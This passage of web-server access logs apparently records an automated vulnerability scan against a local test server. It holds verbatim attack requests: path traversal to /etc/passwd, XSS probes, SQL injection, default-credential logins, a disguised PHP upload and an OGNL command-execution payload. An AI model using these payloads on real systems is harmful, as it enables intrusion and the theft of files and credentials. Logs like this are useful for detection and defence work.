+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"x_login=../../../wp-config","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/supportInstaller HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.035","http_user_agent":"MSIE", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=admin&j_password=12345678&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229KFpdwPbYKg6Ege3TKelcp9rSf\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 